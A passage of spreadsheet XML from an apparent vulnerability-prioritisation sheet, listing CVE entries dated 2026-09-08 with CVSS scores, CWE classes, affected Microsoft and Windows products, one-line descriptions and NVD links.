        </is>
      </c>
      <c r="M863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69439</t>
        </is>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69442</t>
        </is>
      </c>
      <c r="C864" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D864" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E864" s="5" t="inlineStr"/>
      <c r="F864" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G864" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H864" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I864" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J864" s="5" t="inlineStr"/>
      <c r="K864" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L864" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69442</t>
        </is>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69461</t>
        </is>
      </c>
      <c r="C865" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D865" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E865" s="5" t="inlineStr"/>
      <c r="F865" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G865" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H865" s="5" t="inlineStr"/>
      <c r="I865" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J865" s="5" t="inlineStr"/>
      <c r="K865" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L865" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69461</t>
        </is>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69464</t>
        </is>
      </c>
      <c r="C866" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D866" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E866" s="5" t="inlineStr"/>
      <c r="F866" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G866" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H866" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I866" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J866" s="5" t="inlineStr"/>
      <c r="K866" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L866" s="5" t="inlineStr">
        <is>
          <t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69464</t>
        </is>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69465</t>
        </is>
      </c>
      <c r="C867" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D867" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E867" s="5" t="inlineStr"/>
      <c r="F867" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G867" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H867" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I867" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J867" s="5" t="inlineStr"/>
      <c r="K867" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L867" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69465</t>
        </is>
      </c>
    </row>
    <row r="868">
      <c r="A868" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69485</t>
        </is>
      </c>
      <c r="C868" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D868" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E868" s="5" t="inlineStr"/>
      <c r="F868" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G868" s="5" t="inlineStr"/>
      <c r="H868" s="5" t="inlineStr"/>
      <c r="I868" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J868" s="5" t="inlineStr"/>
      <c r="K868" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L868" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69485</t>
        </is>
      </c>
    </row>
    <row r="869">
      <c r="A869" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69494</t>
        </is>
      </c>
      <c r="C869" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D869" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E869" s="5" t="inlineStr"/>
      <c r="F869" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G869" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H869" s="5" t="inlineStr"/>
      <c r="I869" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J869" s="5" t="inlineStr"/>
      <c r="K869" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L869" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69494</t>
        </is>
      </c>
    </row>
    <row r="870">
      <c r="A870" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69495</t>
        </is>
      </c>
      <c r="C870" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D870" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E870" s="5" t="inlineStr"/>
      <c r="F870" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G870" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H870" s="5" t="inlineStr"/>
      <c r="I870" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J870" s="5" t="inlineStr"/>
      <c r="K870" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L870" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69495</t>
        </is>
      </c>
    </row>
    <row r="871">
      <c r="A871" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69499</t>
        </is>
      </c>
      <c r="C871" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D871" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E871" s="5" t="inlineStr"/>
      <c r="F871" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G871" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H871" s="5" t="inlineStr"/>
      <c r="I871" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J871" s="5" t="inlineStr"/>
      <c r="K871" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L871" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69499</t>
        </is>
      </c>
    </row>
    <row r="872">
      <c r="A872" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69511</t>
        </is>
      </c>
      <c r="C872" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D872" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E872" s="5" t="inlineStr"/>
      <c r="F872" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G872" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H872" s="5" t="inlineStr"/>
      <c r="I872" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J872" s="5" t="inlineStr"/>
      <c r="K872" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L872" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69511</t>
        </is>
      </c>
    </row>
    <row r="873">
      <c r="A873" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69518</t>
        </is>
      </c>
      <c r="C873" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D873" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E873" s="5" t="inlineStr"/>
      <c r="F873" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G873" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H873" s="5" t="inlineStr"/>
      <c r="I873" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J873" s="5" t="inlineStr"/>
      <c r="K873" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L873" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69518</t>
        </is>
      </c>
    </row>
    <row r="874">
      <c r="A874" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69522</t>
        </is>
      </c>
      <c r="C874" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D874" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E874" s="5" t="inlineStr"/>
      <c r="F874" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G874" s="5" t="inlineStr"/>
      <c r="H874" s="5" t="inlineStr"/>
      <c r="I874" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J874" s="5" t="inlineStr"/>
      <c r="K874" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L874" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69522</t>
        </is>
      </c>
    </row>
    <row r="875">
      <c r="A875" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69529</t>
        </is>
      </c>
      <c r="C875" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D875" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E875" s="5" t="inlineStr"/>
      <c r="F875" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G875" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H875" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I875" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J875" s="5" t="inlineStr"/>
      <c r="K875" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L875" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69529</t>
        </is>
      </c>
    </row>
    <row r="876">
      <c r="A876" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69547</t>
        </is>
      </c>
      <c r="C876" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D876" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E876" s="5" t="inlineStr"/>
      <c r="F876" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G876" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H876" s="5" t="inlineStr"/>
      <c r="I876" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J876" s="5" t="inlineStr"/>
      <c r="K876" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L876" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69547</t>
        </is>
      </c>
    </row>
    <row r="877">
      <c r="A877" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69551</t>
        </is>
      </c>
      <c r="C877" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D877" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E877" s="5" t="inlineStr"/>
      <c r="F877" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G877" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H877" s="5" t="inlineStr"/>
      <c r="I877" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J877" s="5" t="inlineStr"/>
      <c r="K877" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L877" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69551</t>
        </is>
      </c>
    </row>
    <row r="878">
      <c r="A878" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69556</t>
        </is>
      </c>
      <c r="C878" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D878" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E878" s="5" t="inlineStr"/>
      <c r="F878" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G878" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H878" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I878" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J878" s="5" t="inlineStr"/>
      <c r="K878" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L878" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69556</t>
        </is>
      </c>
    </row>
    <row r="879">
      <c r="A879" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69598</t>
        </is>
      </c>
      <c r="C879" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D879" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E879" s="5" t="inlineStr"/>
      <c r="F879" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G879" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H879" s="5" t="inlineStr"/>
      <c r="I879" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J879" s="5" t="inlineStr"/>
      <c r="K879" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="L879" s="5" t="inlineStr">
        <is>
          <t>Incorrect calculation of buffer size in Windows iSCSI allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69598</t>
        </is>
      </c>
    </row>
    <row r="880">
      <c r="A880" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69601</t>
        </is>
      </c>
      <c r="C880" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D880" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E880" s="5" t="inlineStr"/>
      <c r="F880" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G880" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H880" s="5" t="inlineStr"/>
      <c r="I880" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J880" s="5" t="inlineStr"/>
      <c r="K880" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L880" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69601</t>
        </is>
      </c>
    </row>
    <row r="881">
      <c r="A881" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69603</t>
        </is>
      </c>
      <c r="C881" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D881" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E881" s="5" t="inlineStr"/>
      <c r="F881" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G881" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H881" s="5" t="inlineStr"/>
      <c r="I881" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J881" s="5" t="inlineStr"/>
      <c r="K881" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L881" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69603</t>
        </is>
      </c>
    </row>
    <row r="882">
      <c r="A882" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69614</t>
        </is>
      </c>
      <c r="C882" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D882" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E882" s="5" t="inlineStr"/>
      <c r="F882" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G882" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H882" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I882" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J882" s="5" t="inlineStr"/>
      <c r="K882" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-20</t>
        </is>
      </c>
      <c r="L882" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69614</t>
        </is>
      </c>
    </row>
    <row r="883">
      <c r="A883" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69628</t>
        </is>
      </c>
      <c r="C883" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D883" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E883" s="5" t="inlineStr"/>
      <c r="F883" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G883" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H883" s="5" t="inlineStr"/>
      <c r="I883" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J883" s="5" t="inlineStr"/>
      <c r="K883" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L883" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows iSCSI allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69628</t>
        </is>
      </c>
    </row>
    <row r="884">
      <c r="A884" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69629</t>
        </is>
      </c>
      <c r="C884" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D884" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E884" s="5" t="inlineStr"/>
      <c r="F884" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G884" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H884" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t>
        </is>
      </c>
      <c r="I884" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J884" s="5" t="inlineStr"/>
      <c r="K884" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L884" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69629</t>
        </is>
      </c>
    </row>
    <row r="885">
      <c r="A885" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69632</t>
        </is>
      </c>
      <c r="C885" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D885" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E885" s="5" t="inlineStr"/>
      <c r="F885" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G885" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H885" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I885" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J885" s="5" t="inlineStr"/>
      <c r="K885" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L885" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69632</t>
        </is>
      </c>
    </row>
    <row r="886">
      <c r="A886" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69649</t>
        </is>
      </c>
      <c r="C886" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D886" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E886" s="5" t="inlineStr"/>
      <c r="F886" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G886" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H886" s="5" t="inlineStr"/>
      <c r="I886" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J886" s="5" t="inlineStr"/>
      <c r="K886" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L886" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Raw Image Extension allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69649</t>
        </is>
      </c>
    </row>
    <row r="887">
      <c r="A887" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69669</t>
        </is>
      </c>
      <c r="C887" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D887" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E887" s="5" t="inlineStr"/>
      <c r="F887" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G887" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H887" s="5" t="inlineStr"/>
      <c r="I887" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J887" s="5" t="inlineStr"/>
      <c r="K887" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L887" s="5" t="inlineStr">
        <is>
